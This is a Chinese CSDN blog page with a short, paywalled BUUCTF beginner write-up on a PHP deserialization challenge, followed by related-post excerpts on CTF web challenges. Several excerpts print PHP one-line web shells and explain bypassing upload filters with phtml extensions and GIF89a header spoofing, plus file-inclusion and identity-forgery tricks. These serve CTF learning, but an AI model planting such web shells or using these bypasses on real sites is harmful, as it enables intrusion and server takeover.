buuctf入门学习

已于 2024-06-12 20:42:31 修改
阅读量402 收藏 6
点赞数 9
文章标签: 学习
于 2024-02-04 19:04:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/TheGa31/article/details/135931945
版权
本文概述了三个不同挑战赛中遇到的PHP编程问题,包括备份习惯的提示、利用序列化绕过验证获取flag,以及在Upload1和BuyFlag1中上传和身份验证的技巧。
摘要由CSDN通过智能技术生成

一、[极客大挑战 2019]PHP1

打开连接

看到了一行字说有一个良好备份的习惯

其实这就是一个提示,www.zip看一下备份的文件 

看到了flag.php直接打开看一下 

直接给了flag,提交试一下 这是一个假的flag,那就看一下index.php源码 

只有get传入一个select,unserialize反序列化还说了包含一个文件class.php打开看一下 

最低0.47元/天 解锁文章
TheGa31
关注
buuctf-buyflag
m0_62094846的博客
11-13 590
翻了页面,看了源代码,都没什么信息 右上角有个MENU,点进去看看 Only Cuit's students can buy the FLAG 看到这句话可能就要伪造ip了 但还要回答密码,不知道什么意思,看看源代码 POST password=404a,抓包修改一下身份 user有点特别,应该是在这里检验身份 身份正确,但是要pay for flag 页面需要100000000 money,这应该是参数 数字太长了,用科学计数法,注意用e ...
buuctf[ACTF2020 新生赛]Upload 1
qq_53175607的博客
12-06 687
1.打开题目,先上传一句话木马试试。 <script language='php'>@eval($_POST['love']);</script> 按照传统方法,现将一句话木马利用windows文件后缀识别的特点,将后缀名改为图片后缀名。 上传,抓包改包! 改为phtml后缀 上传成功,构架url用蚁剑连接。 http://5081ca11-6534-49bf-8f3b-94c45fc9946e.node4.buuoj.cn:81/uplo4d/38a64fe21fe9be
个人笔记-[极客大挑战 2019]Upload1
最新发布
qq_73993347的博客
07-29 241
无论是jpg、png还是gif图片都会报错,猜测是文件过大,遂自己制作一张小体积的图片
buuctf [ACTF2020 新生赛]Upload 1
Naptmn的博客
02-24 1220
直接上传一个php的一句话发现无法上传 f12找到前端验证 这里有两个方法 1、直接删除这个元素 2、先上传jpg格式的一句话,bp抓包改为php 发现上传后后端仍然有检查 于是我们上传phtml格式的一句话木马(这里同样需要绕开前端验证) phtml可以理解为是另外一个php的文件后缀名 上传成功后蚁剑连接即可 ...
BUUCTF-[极客大挑战 2019]Upload1
Monica的博客
09-14 2010
题目: 分析: 一个文件上传漏洞 上传一个1.php文件内容为:<?php eval($_POST[1]);?> 发现报错。 查看源代码,没有关于过滤的代码,说明是后端进行的过滤。 bp抓包:修改MIME 报错说不能是php文件、绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht 发现只要phtml文件可以使用,修改后缀为phtml phtml一般是指嵌入了php代码的html文件,但是同样也会作为php解析 PHT文件是一个HTM.
BUUCTF——[极客大挑战 2019]Upload 1
qq_53175607的博客
12-04 2690
1.打开后发现是文件上传题 构建一句话木马 <?php @eval($_POST['shy']);?> 将一句话木马改成jpg文件尝试上传。 抓包改成php 提示文件包含<?,那么我们有思路了,上传图片的时候还扫描了图片头,将一句话木马加图片头 2.然后和一步骤一样上传 ...
BUUCTF pwn前三道
2301_80470992的博客
12-21 1032
gets_s(buffer,size)函数:从标准输入中读取数据,size表示的最多读取的数量,在这里是argv,没有定义是多大,所以我们就可以无限的输入。但是可以发现buffer就只有0xF字节的大小,输入超过0xF个字节以后,你就会溢出,你会覆盖返回地址。代码分析:俩个write函数输出,然后sprintf函数利用%p将sub_40060函数地址(其实就是system函数)打印出来放到s里面,然后由write函数打印出来,由于是64位所以write那是9,存在溢出条件,接下来就是要找后门函数地址了。
BUUCTF杂项挑战:Kali工具与CTF入门问题记录
在"BUUCTF之MISC(持续更新)"的文章中,作者分享了自己作为初学者参与网络安全挑战赛(CTF)时遇到的一些基础问题和解决方案。文章以杂项任务入手,反映了学习过程中的边做边学策略,虽然这种方法对于深入理解可能...
buuctf刷题情况+本周学习内容[2021.01.24]
desdemona_syy的博客
01-24 527
buuctf刷题情况+本周学习内容buuctf刷题(Ctypto)1.MD52.Url编码3.一眼就解密4.看我回旋踢5.摩丝本周学习内容1.视频学习内容2.MATLAB3.培训 buuctf刷题(Ctypto) 1.MD5 用的是这个网站: https://www.cmd5.com/ 2.Url编码 上网搜了一下:url编码是一种浏览器用来打包表单输入的格式。浏览器从表单中获取所有的name和其中的值 ,将它们以name/value参数编码(移去那些不能传送的字符,将数据排行等等)作为URL的一部分或
WEB入门——SQL注入(一)
HasntStartIsOver的博客
06-03 1292
简单的SQL注入
BUUCTF】[极客大挑战 2019]Upload1
aoao331198的博客
03-13 994
试着上传一个一句话木马的.jpg文件 <?phpeval($_GET['abc']); ?> 看样子是不能用php,必须换一种语言 仅仅更改文件后缀不能完全绕过,这里使用GIF89a头文件欺骗 GIF89a图片头文件欺骗 上传成功了,接下来我们在BP中上传,截获数据包,并且把 ...
BUUCTF---[极客大挑战 2019]Upload1
2201_75556700的博客
03-03 642
2.点开链接,需要上传文件,要求是image,上传文件后缀为jpg的一句话木马,发现被检测到了。4.接下来使用bp抓包修改包的后缀为phtml,5.接下来使用蚁剑链接。3.换另一个木马试试。
BUUCTF——[极客大挑战2019]Upload-1
weixin_62248541的博客
11-25 560
BUUCTF-[极客大挑战2019]Upload-1
buuctf-[极客大挑战 2019]Upload1
m0_62094846的博客
12-07 282
上传php,jpg,png,gif都报错 然后看wp GIF89a? <script language="php">eval($_REQUEST[feng])</script> 用这一串GIF89a伪造gif文件就行 真的上传不了假的上传成功了,就满脸问号 把后缀名改成phtml 因为没告诉文件上传后的位置,就要猜测,做这么多题,一般都是在upload里面 upload+文件名 ...
buuctf-web-[极客大挑战 2019]Upload1
mlws1900的博客
08-11 1372
第一个点,修改phtml,第二个点GIF89a(这个点特别的重要,上面我写的代码没有包含),第三个点要用包含。scriptcmd.phtml是我们上传的webshell。我写的webshell里面加了phpinfo();上传的文件夹upload,找到我们上传的文件。bp后缀名修改phtml,加上下面代码。先上传一个无内容的jpg文件。文件里面要加GIF89a。蚁剑连接,获得flag。上传了一个小马代码为。...
BUUFCTF—[极客大挑战 2019]Upload 1
内心不种满鲜花就会长满杂草
05-12 1183
上传图片1.png成功,上传1.php失败,1.pngs成功,说明是黑名单过滤。
ctf题集【BUUCTF WEB】[极客大挑战 2019]Upload1
qq_42667028的博客
01-06 758
alert("whoami")
buuctf include
09-13
BUUCTF学习笔记中,通过文件包含漏洞,可以利用`?file=flag.php`来获取flag的内容。具体来说,通过使用`php://filter/convert.base64-encode/resource`伪协议,可以返回已知页面的代码或flag.php的源代码的base...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值